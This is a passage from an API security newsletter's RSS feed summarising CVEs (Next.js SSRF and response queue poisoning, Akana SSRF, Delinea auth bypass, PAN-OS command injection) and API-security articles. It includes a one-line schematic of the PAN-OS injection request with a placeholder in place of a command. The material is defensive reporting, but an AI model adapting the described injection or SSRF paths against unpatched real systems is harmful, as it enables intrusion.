<p style="font-weight: 400;"><span style="font-weight: 400;">Next, </span><a href="https://cybersecuritynews.com/next-js-server-compromise/" target="_blank" rel="noopener"><span style="font-weight: 400;">we have news of a pair of vulnerabilities</span></a><span style="font-weight: 400;"> in Next.js, a popular web development framework. These vulnerabilities have been assigned </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-34350" target="_blank" rel="noopener"><span style="font-weight: 400;">CVE-2024-34350</span></a><span style="font-weight: 400;"> and </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-34351" target="_blank" rel="noopener"><span style="font-weight: 400;">CVE-2024-34351</span></a><span style="font-weight: 400;">, both with a severity rating of 7.5 (High).</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">CVE-2024-34350 is a vulnerability that can lead to response queue poisoning when exploited by threat actors. This vulnerability is caused by an inconsistent interpretation of crafted HTTP requests, which are meant to be treated as a single request but are instead treated as two separate requests. To exploit this vulnerability, the affected routes must use the rewrites feature in Next.js. This vulnerability has been patched in Next.js versions 13.5.1 and newer, including 14.x.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">CVE-2024-34351 is a Server-Side Request Forgery (SSRF) vulnerability that exists in a vulnerable API endpoint _next/image, which is used to locate an image in the backend. This endpoint is a built-in component and is enabled by default in Next.js. The vulnerability arises when a server action is called, and the response is a redirect, with specific parameters used in the redirect. If the redirect starts with a /, the server will take the result of the redirect server_side and return it to the client. The server_side was found to be taking the host header from the client, which can lead to SSRF if the host header is pointed to an internal host. This vulnerability has been patched in Next.js version 14.1.1.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Assetnote has published a proof of concept for CVE-2024-34351, providing detailed information about the exploitation, source code, and other relevant information. It is recommended that Next.js users upgrade to the latest versions to prevent these vulnerabilities from being exploited.</span></p>
<h2><span style="font-weight: 400;">Demo: Microsoft Build &#8211; Navigating the Depths of API Security Testing</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Our newsletter publisher, 42Crunch, the API Security platform vendor, recently appeared on stage at Microsoft Build showcasing the integration of their API Security testing services with the Microsoft Defender for APIs. Microsoft Build is t</span><span style="font-weight: 400;">he annual conference event for the community of developers and software engineers to discover the latest innovations in code and applications. Following </span><a href="https://42crunch.com/42crunch-and-microsofts-defender-for-cloud-partner-to-deliver-end-to-end-api-security/" target="_blank" rel="noopener"><span style="font-weight: 400;">their recent partnership </span></a><span style="font-weight: 400;">with 42Crunch, </span><span style="font-weight: 400;">Microsoft Product Managers Haris Sohail and Preetham Naik teamed up with 42Crunch’s own Heshaam Attar to explore how best to navigate the depths of API security testing. The session offered a packed audience insights into various API breaches and also a demo by Heshaam where he showcased the</span><span style="font-weight: 400;"> end-to-end use case for both 42Crunch Audit &amp; API Scan</span><span style="font-weight: 400;">. </span><a href="https://build.microsoft.com/en-US/sessions/32d391ca-5c20-45fd-9ba1-fe29ddb202d9?source=sessions"><span style="font-weight: 400;">Full recording available here</span></a><span style="font-weight: 400;"> &#8211; enjoy!</span></p>
<h2><span style="font-weight: 400;">Article: API growth causing cybersecurity concerns</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Next, </span><a href="https://www.businesswire.com/news/home/20240320654923/en/Rampant-API-Growth-Causing-Cybersecurity-Risks-for-Businesses" target="_blank" rel="noopener"><span style="font-weight: 400;">we have an article</span></a><span style="font-weight: 400;"> on a recent survey commissioned by Fastly, Inc., which found that despite APIs&#8217; critical role in the digital economy, most commercial decision-makers ignore the growing security risk they pose for businesses. 95% of respondents said they had experienced API security problems in the last twelve months, with 84% admitting to not having advanced API security in place. The lack of action is attributed to insufficient budget and a lack of expertise.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The survey also revealed sector-based and regional variations in attitudes towards API security. Heavily regulated sectors dealing with sensitive data, such as financial services, were found to be some of the worst culprits regarding API inaction. The UK was marginally ahead of the pack regarding the importance placed on API security, but there was still a tendency not to translate thoughts into actions. The survey suggests that single-provider security solutions and AI could provide answers to the complexity of the API landscape.</span></p>
<h2><span style="font-weight: 400;">Article: The menace of unknown APIs</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The </span><a href="https://securityboulevard.com/2024/05/api-security-and-the-silent-menace-of-unknown-apis/" target="_blank" rel="noopener"><span style="font-weight: 400;">next article summarizes key insights</span></a><span style="font-weight: 400;"> from the recent Imperva </span><i><span style="font-weight: 400;">State of API Security,</span></i><span style="font-weight: 400;"> which discusses the security risks posed by unknown APIs in modern software development. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Shadow APIs, which are undocumented or undiscovered APIs operating outside official channels, can pose security risks if exploited by threat actors. According to the report, there are 29 shadow APIs per account. Deprecated API endpoints, specific routes, or URLs within an API marked for removal but still accessible often contain security vulnerabilities. An average of 16 deprecated endpoints per account were found. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Unauthenticated endpoints, which are API routes that do not require authentication or authorization, can potentially expose sensitive data. Imperva&#8217;s API discovery process revealed an average of 21 unauthenticated API endpoints per account. The article stresses the importance of a proactive, comprehensive API security strategy that includes continuous monitoring, risk assessment, and protection of sensitive data to safeguard against the risks posed by these unknown APIs.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">We frequently discuss the criticality of unknown or shadow APIs; this article is a timely reminder of their importance to API security.</span></p>
<h2><span style="font-weight: 400;">Guide: Updates to Awesome API security guide</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">For recent subscribers, it would be good to share a perennial favorite with readers. André Rainho curates a good list of API security resources on </span><a href="https://github.com/arainho/awesome-api-security" target="_blank" rel="noopener"><span style="font-weight: 400;">GitHub</span></a><span style="font-weight: 400;">. This list references API security tools, cheat sheets, checklists, conferences, books, deliberately vulnerable APIs, and other design resources. </span></p>
<p><span style="font-weight: 400;">I’m happy to see my debut book on </span><i><span style="font-weight: 400;">Defending APIs</span></i><span style="font-weight: 400;"> included in the list of reading resources. Thanks to André Rainho for maintaining this resource for our community.</span></p>
<p>The post <a href="https://apisecurity.io/issue-247-dropbox-and-dell-breaches-vulnerability-in-next-js-api-growth-causing-concerns/">Issue 247: Dropbox and Dell breaches, vulnerability in Next.js, API growth causing concerns</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 246: Critical flaw in API portal, securing GraphQL, building bulletproof APIs</title>
		<link>https://apisecurity.io/issue-246-critical-flaw-in-api-portal-securing-graphql-building-bulletproof-apis/</link>
		
		<dc:creator><![CDATA[Anton Krasovsky]]></dc:creator>
		<pubDate>Fri, 17 May 2024 09:16:19 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<category><![CDATA[api security]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11126</guid>

					<description><![CDATA[<p>This week, we have news of a critical flaw with a popular API portal. We also have guides on securing GraphQL APIs and building bulletproof APIs and news of a new deliberately vulnerable API application. We also have an article on why fraud detection and API security must converge. Dana Epp wraps things up with [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-246-critical-flaw-in-api-portal-securing-graphql-building-bulletproof-apis/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-246-critical-flaw-in-api-portal-securing-graphql-building-bulletproof-apis/">Issue 246: Critical flaw in API portal, securing GraphQL, building bulletproof APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we have news of a critical flaw with a popular API portal. We also have guides on securing GraphQL APIs and building bulletproof APIs and news of a new deliberately vulnerable API application. We also have an article on why fraud detection and API security must converge. Dana Epp wraps things up with views on Bruno as a Postman alternative.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Critical flaw in API portal allows SSRF attacks</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we have </span><a href="https://gbhackers.com/critical-flaw-with-api-portal/" target="_blank" rel="noopener"><span style="font-weight: 400;">news of a critical vulnerability</span></a><span style="font-weight: 400;"> in the Perforce Akana Community Manager Developer and API portal. The flaw could enable malicious actors to perform server-side request forgery (SSRF) attacks. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Community Manager is a sophisticated tool that helps enterprises build an API portal to attract, manage, and support developers who create applications using their APIs. Organizations commonly employ it to develop and maintain developer portals for their APIs.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Server-side request Forgery (SSRF) is a vulnerability that allows an attacker to induce a server-side application to make HTTP requests to an arbitrary domain chosen by the attacker. In an SSRF attack, the attacker abuses functionality on the server to read or update internal resources.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The attacker can request internal services within the organization&#8217;s infrastructure that are not intended to be publicly exposed. This can lead to unauthorized access to sensitive data, performing actions on behalf of the server, or even enabling the attacker to execute arbitrary commands.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This critical severity vulnerability (tracked as </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-2796" target="_blank" rel="noopener"><span style="font-weight: 400;">CVE-2024-2796</span></a><span style="font-weight: 400;">) has a CVSS base score of 9.3 and was disclosed by Jakob Antonsson. It affects versions 2022.1.3 and earlier.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">It is recommended that organizations using the Akana Community Manager Developer Portal update to one of the patched versions immediately.</span></p>
<h2><span style="font-weight: 400;">Article: How to secure GraphQL </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">While REST APIs still dominate as the primary API architectural style used in modern digital platforms, GraphQL is becoming increasingly popular due to its query-based approach. This approach allows clients to request specific data through a single endpoint using a flexible query language. GraphQL can be more efficient in data retrieval but may have a steeper learning curve compared to REST. GraphQL also presents some unique security challenges, and </span><a href="https://securityboulevard.com/2024/04/how-to-secure-graphql-apis-challenges-and-best-practices/" target="_blank" rel="noopener"><span style="font-weight: 400;">our next article</span></a><span style="font-weight: 400;"> covers many of these challenges and the best practices for overcoming them.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">GraphQL can be more challenging to secure compared to REST APIs for several reasons:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><b>Complex queries: </b><span style="font-weight: 400;">GraphQL allows clients to construct complex queries, potentially leading to resource-intensive server operations. Malicious actors might craft queries that cause performance issues or even bring down the server.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Lack of built-in security:</b><span style="font-weight: 400;"> Unlike REST, which can leverage standard HTTP security mechanisms like authentication and authorization on a per-endpoint basis, GraphQL does not have built-in security features. </span></li>
<li style="font-weight: 400;" aria-level="1"><b>Overfetching and resource exposure:</b><span style="font-weight: 400;"> GraphQL&#8217;s flexibility allows clients to request any combination of fields, including sensitive data. If not properly secured, clients might be able to access data they shouldn&#8217;t have access to, leading to data leaks or unauthorized access.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Query depth and complexity:</b><span style="font-weight: 400;"> GraphQL queries can be deeply nested and complex. Without proper validation and limits, clients might send too deep or complex queries, causing performance issues or even crashing the server.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Batched queries: </b><span style="font-weight: 400;">GraphQL supports batching multiple queries into a single request. If not handled carefully, this can be exploited to bypass rate limiting or perform denial-of-service attacks.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Schema introspection:</b><span style="font-weight: 400;"> GraphQL allows clients to introspect the schema, which can expose sensitive information about the API&#8217;s structure and available data types. </span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">The authors recommend the following best practices for security engineers:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Build an inventory of APIs to understand the full attack surface.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Perform GraphQL API threat modeling.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Talk with developers to understand their implementations.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Implement best practices throughout the API lifecycle, including API gateways, secret scanning, testing every API release, and proper security monitoring.</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">For developers, they recommend the following:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Limit access using authentication and authorization.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Input validation.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Rate limiting to block brute force attacks.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Depth limiting to avoid DoS-style attacks.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Schema whitelisting</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Limit the cost of GraphQL queries.</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">For further reading, we have covered GrahpQL in this newsletter </span><a href="https://apisecurity.io/issue-158-data-of-400000-students-exposed-1-million-sites-affected-by-plugin-vulnerabilities-views-on-graphql/"><span style="font-weight: 400;">here</span></a><span style="font-weight: 400;">, </span><a href="https://apisecurity.io/issue-125/"><span style="font-weight: 400;">here</span></a><span style="font-weight: 400;">, and </span><a href="https://apisecurity.io/issue-185-three-trends-in-api-security-graphql-securing-risks-the-importance-of-api-discovery/"><span style="font-weight: 400;">here</span></a><span style="font-weight: 400;">.</span></p>
<h2><span style="font-weight: 400;">Live Broadcast: Navigating the Depths of API Security Testing </span></h2>
<p><span style="font-weight: 400;">On the back of their </span><a href="https://42crunch.com/42crunch-and-microsofts-defender-for-cloud-partner-to-deliver-end-to-end-api-security/" target="_blank" rel="noopener"><span style="font-weight: 400;">API Security partnership announcement</span></a><span style="font-weight: 400;"> last year, experts from 42Crunch and Microsoft take a dive deep into the underbelly of APIs and explore the vulnerabilities in your codebase. Join them in person in Seattle or online at </span><b>Microsoft Build</b><span style="font-weight: 400;"> where they explore</span><span style="font-weight: 400;"> scanning OpenAPI specs to dynamic testing, to equip you with practical strategies to harden your APIs against attacks. </span></p>
<p style="font-weight: 400;"><a href="https://register.build.microsoft.com/" target="_blank" rel="noopener"><span style="font-weight: 400;">Register online for free</span></a></p>
<p><a href="https://register.build.microsoft.com/" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="alignnone wp-image-11128" src="https://apisecurity.io/wp-content/uploads/2024/05/Microsoft-Build-42C-300x169.png" alt="" width="600" height="338" srcset="https://apisecurity.io/wp-content/uploads/2024/05/Microsoft-Build-42C-300x169.png 300w, https://apisecurity.io/wp-content/uploads/2024/05/Microsoft-Build-42C.png 720w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h2><span style="font-weight: 400;">Article: Building bulletproof APIs </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The </span><a href="https://medium.com/@deepak.gupta79/building-bulletproof-apis-design-principles-for-scalable-systems-and-nfrs-36c3e940b2c7" target="_blank" rel="noopener"><span style="font-weight: 400;">next article is a well-articulated guide</span></a><span style="font-weight: 400;"> to building bulletproof APIs. By bulletproof, the author means meeting a broader range of non-functional requirements (NFRs) that go beyond pure security to encompass smooth operation, security, and scalability.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The author suggests four core principles for scalable systems, namely:</span></p>
<ol style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><b>Focusing on Resources:</b><span style="font-weight: 400;"> Simplify your API design by treating data as resources with unique identifiers rather than relying on complex methods. </span></li>
<li style="font-weight: 400;" aria-level="1"><b>Self-Discoverable APIs:</b><span style="font-weight: 400;"> Enable clients to explore and discover available actions and resources within your API by incorporating HATEOAS principles. Include links in API responses that guide clients to related resources and actions. </span></li>
<li style="font-weight: 400;" aria-level="1"><b>Managing API Evolution: </b><span style="font-weight: 400;">Implement a well-defined versioning strategy to plan for future changes and enhancements to your API and ensure that updates don&#8217;t break existing integrations. </span></li>
<li style="font-weight: 400;" aria-level="1"><b>Self-Contained Requests:</b><span style="font-weight: 400;"> Design your API in a stateless manner, where each request contains all the necessary information for processing. This means the server doesn&#8217;t need to retain any session state between requests. </span></li>
</ol>
<p style="font-weight: 400;"><span style="font-weight: 400;">To optimize performance and scalability, implement the following:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><b>Pagination and Filtering</b><span style="font-weight: 400;">: For large result sets, use pagination to allow clients to retrieve data in smaller blocks and use filtering to limit data returned.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Caching:</b><span style="font-weight: 400;"> Use caching mechanisms to store common data on the server side. This significantly reduces backend load and improves client performance.</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">To ensure reliability and security, implement the following:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><b>Error Handling and Response Codes:</b><span style="font-weight: 400;"> Design a consistent and accurate error-handling approach using standard HTTP response codes.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Rate Limiting and Throttling:</b><span style="font-weight: 400;"> Implement safeguards to limit the rate of API calls to prevent abuse and being overwhelmed by excessive traffic. </span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">Finally, the author identifies the following vital NFRs that should be addressed in robust systems:</span></p>
<ol style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Performance</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Scalability</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Security</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Reliability</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Usability</span></li>
</ol>
<p style="font-weight: 400;"><span style="font-weight: 400;">The article emphasizes that considering NFRs alongside core design principles is crucial for building exceptional APIs. By adhering to these principles, developers can create robust, scalable, and secure APIs that deliver a seamless user experience and provide a solid foundation for future growth.</span></p>
<h2><span style="font-weight: 400;">Guide: Damn Vulnerable RESTaurant </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">I am always pleased to see new tools in the API security space, and this week, </span><a href="https://www.helpnetsecurity.com/2024/04/17/damn-vulnerable-restaurant-open-source-api-service/" target="_blank" rel="noopener"><span style="font-weight: 400;">I am happy to cover </span></a><span style="font-weight: 400;">a new deliberately vulnerable API application entitled </span><i><span style="font-weight: 400;">Damn Vulnerable RESTaurant</span></i><span style="font-weight: 400;">. The project is the brainchild of Krzysztof Pranczk, who describes the goals as follows:</span></p>
<blockquote>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">“I wanted to create a generic playground for ethical hackers, developers, and security engineers where they could identify, exploit, or fix vulnerabilities. Furthermore, security engineers could implement new vulns and test their detection tools because the Python FastAPI framework allows quick development,”</span></i></p>
</blockquote>
<p style="font-weight: 400;"><span style="font-weight: 400;">The vulnerable API service is designed specifically for educational and training purposes, catering to developers, ethical hackers, and security engineers. The project aims to create an environment that can be easily expanded with new vulnerable endpoints and mechanisms, facilitating hands-on training in detecting and exploiting identified vulnerabilities.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This training playground offers unique opportunities for various professionals:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><b>Developers:</b><span style="font-weight: 400;"> Engage in a dedicated game where you can interactively identify and fix vulnerabilities, enhancing your skills in secure coding practices.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Ethical Hackers: </b><span style="font-weight: 400;">Put your skills to the test by exploiting vulnerabilities manually or using automated tools. Approach it as a Capture the Flag (CTF) challenge, starting as a low-privileged API user and escalating to a </span><i><span style="font-weight: 400;">root</span></i><span style="font-weight: 400;"> user. There is one path to achieve this goal, and API documentation is provided to guide your hacking adventure.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Security Engineers:</b><span style="font-weight: 400;"> Utilize a range of security automation tools, such as Static Application Security Testing (SAST), Dynamic Application Security Testing (DAST), and Infrastructure as Code (IaC), to assess and refine vulnerability detection mechanisms.</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">The project can be found on </span><a href="https://github.com/theowni/Damn-Vulnerable-RESTaurant-API-Game" target="_blank" rel="noopener"><span style="font-weight: 400;">GitHub</span></a><span style="font-weight: 400;"> and be easily deployed in Docker or directly into GitHub Codespaces.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Thanks to Krzysztof for the exciting project; I look forward to experimenting shortly.</span></p>
<h2><span style="font-weight: 400;">Article: API security and fraud detection must converge</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The </span><a href="https://www.cpomagazine.com/cyber-security/beyond-silos-why-fraud-detection-and-api-security-must-converge/" target="_blank" rel="noopener"><span style="font-weight: 400;">next article </span></a><span style="font-weight: 400;">explains why API security and fraud detection should converge to provide optimal protection against emerging threats. These two disciplines have traditionally been treated as separate entities, but the evolving threat landscape demands a more integrated approach.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Bots have revolutionized the fraud landscape, with APIs becoming their primary target. These automated tools enable fraudsters to carry out account takeovers, credential stuffing, and fake account creation by exploiting vulnerabilities in API systems. The article highlights real-world examples of API-centric fraud, such as inventory manipulation and scalping, loyalty and reward program API abuse, and gift card balance fraud.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The article advocates for a converged approach to API security and fraud detection to combat these threats effectively. This involves sharing data and insights between security and fraud teams to gain a more comprehensive understanding of risks. Behavioral bot detection systems that analyze API interactions and device fingerprinting are crucial in unmasking sophisticated bots mimicking legitimate users. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Silos between fraud and security teams create dangerous blind spots, leaving businesses vulnerable to API-based attacks. Fraud detection often lacks visibility into API-level attacks, while API security tools may overlook fraudulent behavior disguised as legitimate traffic. By integrating fraud detection, API security, and advanced bot protection, organizations can create a more adaptive defense capable of swiftly responding to threats and mitigating vulnerabilities.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In conclusion, a holistic strategy that combines fraud detection and API security is essential for safeguarding data, customers, and reputations in today&#8217;s API-centric world.</span></p>
<h2><span style="font-weight: 400;">Article: Using Bruno as an alternative to Postman</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Finally, we </span><a href="https://danaepp.com/is-bruno-good-for-api-hacking" target="_blank" rel="noopener"><span style="font-weight: 400;">have news of another potentially exciting tool</span></a><span style="font-weight: 400;"> for API developers and their security teams. </span><a href="https://www.usebruno.com/" target="_blank" rel="noopener"><i><span style="font-weight: 400;">Bruno</span></i></a><span style="font-weight: 400;"> is a new open-source API client with the following goal:</span></p>
<blockquote>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">“Bruno is a Fast and Git-Friendly Opensource API client, aimed at revolutionizing the status quo represented by Postman, Insomnia and similar tools out there.”</span></i></p>
</blockquote>
<p style="font-weight: 400;"><span style="font-weight: 400;">As one would expect, Dana gives this new tool a thorough walkthrough. In his in-depth review, he highlights several issues he encountered and offers his views on Bruno&#8217;s future. In meme form, here’s his conclusion:</span></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-11129" src="https://apisecurity.io/wp-content/uploads/2024/05/Bruno-lion-king-image-300x229.jpg" alt="" width="600" height="458" srcset="https://apisecurity.io/wp-content/uploads/2024/05/Bruno-lion-king-image-300x229.jpg 300w, https://apisecurity.io/wp-content/uploads/2024/05/Bruno-lion-king-image-768x587.jpg 768w, https://apisecurity.io/wp-content/uploads/2024/05/Bruno-lion-king-image.jpg 974w" sizes="auto, (max-width: 600px) 100vw, 600px" /></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Likewise, I am ready for a new API client and will soon take Bruno for a test drive and buy a license to support the project. </span></p>
<p><br style="font-weight: 400;" /><br style="font-weight: 400;" /><br style="font-weight: 400;" /></p>
<p>The post <a href="https://apisecurity.io/issue-246-critical-flaw-in-api-portal-securing-graphql-building-bulletproof-apis/">Issue 246: Critical flaw in API portal, securing GraphQL, building bulletproof APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 245: Delinea patches API vulnerability, API vulnerability in Palo Alto devices</title>
		<link>https://apisecurity.io/issue-245-delinea-patches-api-vulnerability-api-vulnerability-in-palo-alto-devices/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Fri, 03 May 2024 09:56:45 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11121</guid>

					<description><![CDATA[<p>This week, we have two vulnerabilities: an API vulnerability in the Delinea platform and a remote command execution (RCE) affecting Palo Alto PAN-OS devices. We also have articles on how to fix API design, seven ways to better manage supply chain risk, and whether OpenBanking will transform the future of finance. Finally, we have Dana [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-245-delinea-patches-api-vulnerability-api-vulnerability-in-palo-alto-devices/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-245-delinea-patches-api-vulnerability-api-vulnerability-in-palo-alto-devices/">Issue 245: Delinea patches API vulnerability, API vulnerability in Palo Alto devices</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we have two vulnerabilities: an API vulnerability in the Delinea platform and a remote command execution (RCE) affecting Palo Alto PAN-OS devices. We also have articles on how to fix API design, seven ways to better manage supply chain risk, and whether OpenBanking will transform the future of finance. Finally, we have Dana Epp on how to use “naughty strings” to break APIs.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Delinea patches API vulnerability</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">This week&#8217;s first vulnerability </span><a href="https://www.scmagazine.com/news/delinea-patches-api-vulnerability-in-secret-server-cloud" target="_blank" rel="noopener"><span style="font-weight: 400;">comes courtesy of SC Media</span></a><span style="font-weight: 400;">, who report that Delinea, privileged access management (PAM) provider, confirmed a critical vulnerability in its Delinea Platform and Secret Server Cloud products on April 15, 2024. The vulnerability, identified as a flaw in the SOAP API, could allow attackers to bypass authentication, gain administrative access, and extract sensitive information if left unpatched.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Delinea has addressed the issue by patching the vulnerability in its cloud-based service and providing a remediation guide for its on-premises customers. They stated that they found no evidence of compromised customer data or attempts to exploit the vulnerability.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Security professionals emphasize the importance of immediately updating on-premises installations of Delinea Secret Server Cloud to mitigate the risk of potential network compromises and data breaches. If exploited, the vulnerability could grant attackers significant control over the network, enabling them to move laterally, escalate privileges, deploy malware, and launch ransomware attacks.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The article also highlights API security&#8217;s importance, as attackers know that most organizations lack adequate protection for their internal API assets: </span></p>
<blockquote>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">“Attackers are well aware that most organizations do not have API security solutions protecting their internal API assets”</span></i></p>
</blockquote>
<h2><span style="font-weight: 400;">Vulnerability: API vulnerability in Palo Alto devices</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">This week&#8217;s second API vulnerability comes </span><a href="https://securityboulevard.com/2024/04/how-to-track-and-stop-cve-2024-3400-palo-alto-devices-api-exploit-causing-critical-infrastructure-and-enterprise-epidemics/" target="_blank" rel="noopener"><span style="font-weight: 400;">courtesy of Security Boulevard</span></a><span style="font-weight: 400;">, covering a remote code execution (RCE) vulnerability in the Palo Alto PAN-OS devices. The vulnerability potentially allowed attackers to execute commands on the devices, which ultimately could have led to device takeover. The vulnerability (tracked as </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-3400" target="_blank" rel="noopener"><span style="font-weight: 400;">CVE-2024-3400</span></a><span style="font-weight: 400;">) has already been addressed by Palo Alto, which </span><a href="https://security.paloaltonetworks.com/CVE-2024-3400" target="_blank" rel="noopener"><span style="font-weight: 400;">recommends</span></a><span style="font-weight: 400;"> that customers immediately update their devices to a version of firmware greater than 10.2. There are no indications that this vulnerability was exploited in the wild.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The exploit itself was surprisingly simple, involving the injection of code into an XML RPC request as shown:</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;"><code>&lt;cmd code="ping"&gt;OS command exploit is there&lt;/cmd&gt;</code></span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This type of attack can be prevented by using well-tuned WAFs, while dedicated API protection solutions offer excellent defenses against injection attacks of this type. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">An interesting side note about this vulnerability was that GitHub responded quickly to remove copies of proof-of-concept and exploit code from their repositories. Despite their efforts, the code spread rapidly in the cybersecurity community. Fortunately, in this case, Palo Alto rapidly released a patch.</span></p>
<h2><span style="font-weight: 400;">Article: How to fix API design</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The next article </span><a href="https://thenewstack.io/api-design-is-pretty-bad-heres-how-to-fix-it/" target="_blank" rel="noopener"><span style="font-weight: 400;">comes via The New Stack</span></a><span style="font-weight: 400;"> and covers API design, why they consider it to be in a poor state, and how this impacts, among other things, API security. The fundamental issue with API design concerns the long lifetime of APIs, which means that poor decisions often exist longer than ideal to maintain backward compatibility and legacy systems. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Some of the impacts of poor API design include the following:</span></p>
<ol style="font-weight: 400;">
